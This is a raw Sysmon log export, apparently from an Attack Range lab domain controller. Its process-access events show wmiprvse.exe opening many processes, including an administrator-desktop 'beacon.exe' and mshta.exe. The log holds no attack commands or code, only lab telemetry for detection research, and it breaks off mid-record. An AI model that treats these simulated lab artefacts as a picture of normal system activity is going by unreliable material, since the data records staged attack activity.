16:58:30.202{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246565Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.202{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246564Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.202{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246563Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.202{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246562Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.202{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246561Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.202{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246560Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.202{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002246559Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.202{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94B8FA32374F2CD79C13938310EDA398,SHA256=BFAFD1F198EE815D00E0842FE8C068D8B738B4C54957C0938E42DC6F846BFD11,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002246558Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.202{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246557Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.202{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246556Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.188{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246555Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.188{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246554Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.188{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246553Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.188{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246552Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.188{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246551Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.188{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246550Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.188{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246549Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.188{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246548Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.188{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246547Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.188{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246546Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.188{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program 